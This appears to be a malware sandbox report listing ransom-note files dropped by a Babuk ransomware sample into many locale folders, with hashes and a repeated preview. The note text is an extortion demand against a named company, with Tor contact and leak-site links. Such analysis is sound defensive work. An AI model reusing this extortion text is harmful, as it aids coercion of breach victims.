                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\af-ZA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-AE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-BH\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-DZ\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-EG\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-IQ\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-JO\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-KW\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-LB\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-LY\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-MA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-OM\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-QA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-SA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-SY\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-TN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-YE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
